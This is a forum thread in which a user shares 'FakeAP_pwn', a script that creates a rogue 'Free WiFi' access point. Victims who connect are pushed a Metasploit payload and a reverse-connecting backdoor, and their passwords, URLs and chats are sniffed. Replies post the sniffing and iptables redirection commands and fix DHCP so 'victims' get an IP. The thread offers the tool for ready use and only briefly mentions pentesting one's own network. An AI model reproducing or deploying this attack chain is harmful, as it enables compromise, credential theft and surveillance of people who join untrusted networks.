Page 1 of 5 123 ... LastLast
Results 1 to 10 of 44

Thread: [Tutorial] How to: Create Fake AP (with a auto bash script!)

  1. #1

    Lightbulb [Script] FakeAP_pwn-v0.1 - Create a Fake AP (auto bash script)

    Links
    Commands: http://pastebin.com/f3971a16b
    Download 7z: http://www.mediafire.com/download.php?ykobuygmiyn


    What is this?
    I've had a go at making a bash script to automate creating a 'Fake AP' (Access Point) and 'pwn' who connects to it!
    This is a bash script and a few other things to make a fake access point which is transparent (allowing target afterwards to surf the Inter-webs after they have been exploited!).


    How does this work?
    > Creates a fake AP and DHCP server.
    > Runs a web server & creates an exploit with metasploit.
    > Waits for target to connect, download and run the exploit after it allows them to surf the Inter-webs.
    > Uses a backdoor, SBD (Secure BackDoor - bit like netcat!), though this could be replace with VNC if attacker wishes!
    > Then starts a few 'sniffing' programs (dnsiff suite) to watch what target does!


    What do I need?
    > Two interfaces, one for Internet (wired/wireless) and the other for becoming an access point (wireless only!)
    > A Internet connection (though you could mod it so its non transparent)
    > airmon-ng, dhcpd3, apache,metasploit, snarf suit <--- All on BackTrack!


    Whats in the 7z file?

    > FakeAP_pwn.sh <--- Bash script to run
    > FakeAP_pwn.rc <--- Metasploit resource
    > sbdbg.exe <--- Backdoor
    > dhcpd.conf <--- My DHCP script (in-case you need it)
    > index.html <--- The page the target is force to see before they have access to the Internet.


    How to use:

    1.) Extract the 7z file to /root/FakeAP_pwn.
    2.) Edit FakeAP_pwn.sh with your gateway, Internet interface, wireless AP interface.
    3.) sh /root/FakeAP_pwn/FakeAP_pwn.sh
    4.) Wait for a connection...
    5.) Game Over.


    Notes:
    It works for me (=
    I'm running BackTrack 4 Pre Final, The target is running Windows XP Pro SP3 (fully up-to-date 2009-03-25), with no firewall and no AV. Not tested with anything else!
    The connections is reverse - so the connection comes from the target to attacker therefore as the attacker is the server it could help out with firewalls...
    There is stuff comment out; the stuff at the end I want to happen, the other stuff is other methods of doing the same thing!
    FakeAP_pwn.7z (17.7KB, MD5 006ee8522deb5c4d71c754e94282a516)

    Blog Post:http://g0tmi1k.blogspot.com/2009/06/...e-ap-with.html
    Forum Post: http://forums.remote-exploit.org/wir...sh-script.html



    ~g0tmi1k
    ~ Have you, g0tmi1k? ~
    :rolleyes: <(^^,)> :p d[-_^]b (= =D-->--< :eek:

  2. #2
    Senior Member fnord0's Avatar
    Join Date
    Jul 2008
    Posts
    144

    Default

    bravo! I am grabbing it right now, will give it a shot (something new to play with) ... as I have yet to mess with fakeAPs...it just so happens I was tonight looking thru these forums and ran into some great posts dealing with just this subject (and karmetasploit), but most of the posts have alot to do with BT3 -- yet I'm sure alot easily applies to backtrack4 (pre final). thanks for the effort, this will put me on the right track for sure, I will report back with my experience!
    'see the fnords!'

  3. #3
    Very good friend of the forum Virchanza's Avatar
    Join Date
    Jan 2010
    Posts
    863

    Default

    Gonna give this a go myself too... I'll let cha know
    Ask questions on the open forums, that way everybody benefits from the solution, and everybody can be corrected when they make mistakes. Don't send me private messages asking questions that should be asked on the open forums, I won't respond. I decline all "Friend Requests".

  4. #4
    Senior Member fnord0's Avatar
    Join Date
    Jul 2008
    Posts
    144

    Default

    I gave 'er a go, and I gotta say it worked (( with some changes )) I am quite impressed tho, very cool congrats! this helped me a lot with my first go at fake APs. I am running an alfa awus050nh 802.11a/b/g/n USB device, off the rt2800usb (rt2x00-based) module-set. so I dunno if that came into play why I had issues or not?
    (( again this was my first fakeAP use, so I am gonna tell ya what I had to do to get it to work with yr script, but please don't laugh if I spout off something that should be considered a given when working with this type of environment... i am just new to it is all ))

    - I added the following variables (well, changed fakeap_interface) to yr script after some troubleshooting with airbase-ng not starting correctly on my BT4pf box ::
    export fakeap_interface=mon0 <<-- I tried wlan0, but airbase-ng complained (my konsole buffer got overwritten, so I cant give specifics), it essentially wanted monitor mode
    export fakeaphome=/root/wifi/FakeAP_pwn <<-- I wanted to run yr tool in my own dir (( I then called yr scripts using $fakeaphome ))
    export airbasehome=/usr/sbin/airbase-ng <<-- most calls for xterm worked "right out of yr archive", but the call for airbase xterm session would die everytime! I tested, and found I had to call airbase-ng with full path ($airbasehome), and BAM it worked (not sure why??)
    export dhcpdhome=/usr/sbin/dhcpd3 <<-- another xterm oddity, this time with dhcpd3 ( root's $PATH variable includes /usr/sbin, so I not sure why I have to call the full path, but it's required on my box, in this script )

    ---------------------------------------------E D I T---------------------------------------------

    ok, change up... instead of all the "export $toolnamehome" bs, I kept the "export fakeaphome=/root/wifi/FakeAP_pwn" so I could still use yr script in it's own dir...
    then created a new "export toolsdir=/usr/sbin" ala airoscript
    then just put "$toolsdir/" in front of each call to the tools airbase-ng, dhcpd3, urlsnarf, dsniff, and msgsnarf. (as they all resided in /usr/sbin, easy enuff)
    after those changes, I started yr script and just about everything else but dhcpd worked... I fired up my upstairs computer, configured by atheros/mad-wifi-based card to connect to the new "Free WiFi" AP, and .... no IP address, unable to pull DHCP! manually configuring 10.0.0.2/24 worked, and I was able to ping 10.0.0.1!

    now, I cannot for the life of my figure this part out?! dhcpd3 with BT4 pre final... I kept getting this error, and dhcpd3 would die ::

    Code:
    Can't open /root/wifi/FakeAP_pwn/dhcpd.conf: Permission denied
    now, I would get that calling dhcpd3 from command line, or thru yr script, everywhere! if I'm running the command line (as taken from yr script) "/usr/sbin/dhcpd3 -d -f -cf /root/wifi/FakeAP_pwn/dhcpd.conf at0" I can duplicate the above error everytime (yes, I own the dir & file, 777 permissions, user:group = root:root -- I'm root for christ sake's, but I did check and re-chown/re-chmod...), BUT if I move the dhcpd.conf file to /etc/dhcp3, but I get this damned error, yet the dhcpd server would work flawlessly ::

    Code:
    Can't open /root/wifi/FakeAP_pwn/dhcpd.conf: Permission denied
    I ended up with the following line for my change to yr script for calling "dhcpd3" ::
    Code:
    xterm -geometry 75x25+1+100 -T DHCP -e $dhcpdhome -d -f at0&
    also, I notice @ near the bottom of yr script you explicitly call the following on wlan0 ::
    Code:
    xterm -geometry 100x10+470+0 -T URLs -e urlsnarf -i wlan0&
    xterm -geometry 100x10+470+150 -T Passwords -e dsniff -i wlan0&
    xterm -geometry 100x10+470+300 -T "IM Chat" -e msgsnarf -i wlan0&
    I'd suspect one would want to change wlan0 to $fakeap_interface, as in my case I had to run it off "mon0" interface.

    I too would like to see the things you got listed at the very bottom of yr script, but first I need figure out what they do! hahaha, I've yet to play too much with metasploit... and since I was running linux on the box I had connecting to the fakeAP, I couldnt test out the metaspolit hack you had (SBD... wine? ha).

    all in all, excellent learning tool! and a great tool to pentest yr own W/LAN. good stuff! consider me a fan
    'see the fnords!'

  5. #5

    Default

    fnord0,
    WOW! Thanks for testing! & thanks for the thanks
    I was using:
    > inbuilt Acer 5920 WiFi (Intel iwl4965?) - wlan0
    > USD Linksys WUSB54GC - wlan1

    Dude, don't worry - the script was made for me and me only =P
    I'm glad that it works on other peoples setup, tho I might now make v2 or something which is more "universal". The settings which are there at the only things which I need to "tweak". I might end up making more settings, which has path to files etc

    And thanks for pointing out "wlan0", I forgot to change them after I was testing it out! Think it needs to be "at0", tho I'm not too sure...

    I missed out the bit, where I compiled sbd in bt4 (tho I will correct this asap), though I could try and do it from wine, using the same file...

    The bit at the bottom is metasplot stuff, get system info, get username, get hashs (and then crack them with john the ripper!)

    Its odd that you have to give the path to the programs, I wouldnt why that is, as we both are using backtrack 4 pre final

    btw, happy learning



    Virchanza,
    Please do! More input the better (though you can see that its not perfect...yet (; )



    p.s. Thanks for the vote
    ~ Have you, g0tmi1k? ~
    :rolleyes: <(^^,)> :p d[-_^]b (= =D-->--< :eek:

  6. #6
    Just burned his ISO
    Join Date
    May 2009
    Posts
    6

    Default

    Works for me, just changed ssid, interfaces, done. Thanks for sharing. o/

    Edit: Also, this helps me understand how to share internet with people. Years ago, I would have clicked >9000 times through a variety of windows, configured settings on clients, all that tedious stuff. Now, I'd just remove the payload/exploit/fun section, tweak as I like and there we go.

    Many thanks, blessings, and {0,1,2,3...w} internets to you, my good sir.

    Post Septum

    You could disable payload stuff and fire up hamster/ferret - beautiful.

  7. #7
    Just burned his ISO
    Join Date
    Jun 2009
    Posts
    8

    Default

    i tried to mod the script, to get a non transparent ap:

    ifconfig at0 up
    ifconfig lo up
    ifconfig at0 10.0.0.1 netmask 255.255.255.0
    ifconfig at0 mtu 1400
    route add -net 10.0.0.0 netmask 255.255.255.0 gw 10.0.0.1
    iptables --flush
    iptables --table nat --flush
    iptables --delete-chain
    iptables --table nat --delete-chain
    echo 1 > /proc/sys/net/ipv4/ip_forward
    iptables -t nat -A PREROUTING -p udp -j DNAT --to 10.0.0.1
    iptables -P FORWARD ACCEPT
    iptables -t nat -A PREROUTING -p tcp --dport 80 -j DNAT --to 10.0.0.1

    but it still does not work, any ideas?

  8. #8

    Default

    Here is the notes which Ive made for making a fakeAP (non transparent mode)
    http://pastebin.com/f1333c8f3

    Does that help?
    ~ Have you, g0tmi1k? ~
    :rolleyes: <(^^,)> :p d[-_^]b (= =D-->--< :eek:

  9. #9
    Just burned his ISO
    Join Date
    Jun 2009
    Posts
    8

    Default

    does not work for me.
    do you use the same dhcpd.conf as in transparent mode?
    if i try to connect to any webpage, the browser does nothing..

  10. #10
    Junior Member
    Join Date
    Dec 2007
    Posts
    76

    Default

    Hi, I've tried this script. I've also edited it with the comments received above which make it work better. Only problem is when I connect to this from my victim machine, it doesn't assign it an IP for some reason. I cant work it out.

    I am using the eth0 adapter as the internet connection and the wlan0 for the fake ap.

    I have put the script i've edited up on pastebin :
    pastebin - collaborative debugging tool

    I'm pretty sure there aren't any errors on this, but just can't seem to get the dhcp to assign the victims an ip, thus 'limited or no connectivity' error. Have you any idea how i can sort this?


    Cheers,
    ecs

Page 1 of 5 123 ... LastLast

Posting Permissions

  • You may not post new threads
  • You may not post replies
  • You may not post attachments
  • You may not edit your posts
  •